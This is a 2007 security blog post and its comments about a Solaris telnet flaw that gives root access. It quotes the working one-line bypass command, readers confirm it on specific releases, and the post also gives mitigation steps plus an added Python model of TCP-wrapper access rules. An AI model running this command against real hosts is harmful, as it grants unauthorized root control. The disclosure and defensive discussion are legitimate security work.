Solaris Telnet 0day or Embarrassment
February 12th, 2007 by SecuriTeam, Filed under: Commentary, Full Disclosure
Johannes Ullrich from the SANS ISC sent this to me, and then I saw it on the DShield list:
If you run Solaris, please check if you got telnet enabled now. If you can, block port 23 at your perimeter. There is a fairly trivial Solaris telnet 0-day.
telnet -l "-froot" [hostname]
will give you root on many Solaris systems with default installs.
We are still testing. Please use our contact form at
https://isc.sans.org/contact.html
if you have any details about the use of this exploit.
You mean they still use telnet?!
Others mentioned the AIX rlogin vulnerability (identical) from 1994:
http://www.cert.org/advisories/ca-1994-09.html
Update from HD Moore:
“but this bug isn't -froot, it's -fanythingbutroot =p”
On the exploits@ mailing list and on DShield this vulnerability was verified as real.
If Sun doesn't yet block port 23/tcp incoming on their /8, I'd make it a strong suggestion.
Anyone else running Solaris?
I made a joke about this being a PR stunt for people to download Solaris (to test this vulnerability), as apparently downloads are somewhat slow at the moment.
gadi evron,
ge@beyondsecurity.com.
Doesn’t this date from 1994? …
Yep, for another OS. Not a 0day either but rather fully disclosed, but that’s what the definition has become.
This is just so amusing, as I recently went on a couple of Solaris 10 courses at Sun, and they were still teaching people to use telnet to get from one host to another!
I mentioned the security implications and was told that on a secure network, telnet is fine!!
bwhahahahaha
Solaris: Forgot the root password? Not so bad......
Anyone who has forgotten the root password to their Solaris box does not need to reboot. Since telnet is switched on by default and has a nasty 0-day bug, you can simply log in with telnet -l "-froot" hostname. OK, with newer ve…
Yeap. I tested on a few servers (Solaris X86) and SPARC boxes and it works. Tested on Solaris 10 Rel 11/06 SPARC, Solaris 10 06/06 X86.
Wow, this is great information. I was wondering if other software was affected by a similar flaw!
This is very serious, probably the most serious flaw to come out this year.
Another thing that will help: in Solaris 9 and 10, TCP wrappers are built in.
Edit /etc/default/inetd:
ENABLE_TCPWRAPPERS=YES
Build a /etc/hosts.allow and /etc/hosts.deny.
At least you can restrict which IP addresses can connect to in.telnetd (and any other inetd service, for that matter).
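As an added illustration of the hosts.allow / hosts.deny step in the comment above (example code, not from the post, the commenter or Sun), here is a small Python model of how tcpd evaluates those two files for in.telnetd, including the ENABLE_TCPWRAPPERS gate without which inetd never reads them. The file contents are constructed, and the matcher covers only a subset of hosts_access(5) syntax (ALL, exact address, net/mask, trailing-dot prefix).

```python
import ipaddress

# Constructed sample files (not from any real host); policy scoped to in.telnetd only.
INETD_DEFAULT = "# /etc/default/inetd\n#ENABLE_TCPWRAPPERS=NO\nENABLE_TCPWRAPPERS=YES\n"
HOSTS_ALLOW = "# /etc/hosts.allow\nin.telnetd: 10.0.1.0/255.255.255.0, 192.168.5.\n"
HOSTS_DENY = "# /etc/hosts.deny\nin.telnetd: ALL\n"

def strip_comments(text):
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if line:
            yield line

def tcpwrappers_enabled(inetd_default):
    """True only for an uncommented ENABLE_TCPWRAPPERS=YES; otherwise inetd ignores the hosts files."""
    return any(l.replace(" ", "") == "ENABLE_TCPWRAPPERS=YES" for l in strip_comments(inetd_default))

def parse_rules(text):
    """[(daemon_list, client_list)] from hosts.allow/hosts.deny; options after a 2nd ':' ignored."""
    rules = []
    for line in strip_comments(text):
        fields = line.split(":")
        if len(fields) < 2:
            raise ValueError(f"malformed rule: {line!r}")
        rules.append(([d.strip() for d in fields[0].split(",")],
                      [c.strip() for c in fields[1].split(",")]))
    return rules

def client_matches(pattern, ip):
    """Subset of hosts_access(5): ALL, exact address, 'net/mask', trailing-dot prefix."""
    if pattern == "ALL":
        return True
    if "/" in pattern:
        return ipaddress.ip_address(ip) in ipaddress.ip_network(pattern, strict=False)
    if pattern.endswith("."):
        return ip.startswith(pattern)
    return ip == pattern

def rule_matches(rules, daemon, ip):
    return any(("ALL" in ds or daemon in ds) and any(client_matches(c, ip) for c in cs)
               for ds, cs in rules)

def hosts_access(daemon, ip, allow=HOSTS_ALLOW, deny=HOSTS_DENY, inetd=INETD_DEFAULT):
    """tcpd order: hosts.allow first, then hosts.deny, else allow (moot if wrappers are off)."""
    if not tcpwrappers_enabled(inetd):
        return "allow (tcp wrappers disabled)"
    if rule_matches(parse_rules(allow), daemon, ip):
        return "allow"
    if rule_matches(parse_rules(deny), daemon, ip):
        return "deny"
    return "allow"
```

Note that the deny rule names only in.telnetd, so other inetd services keep their previous exposure; a catch-all `ALL: ALL` in hosts.deny is the usual stricter choice.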
Bulletin 00085 - 22/02/2007…
1.- Two new security flaws in Firefox 2.- Unauthorized deletion of files via rm in……
Oh fuck, it was gotten from 1994?
Where is the latest, and there is nothing for down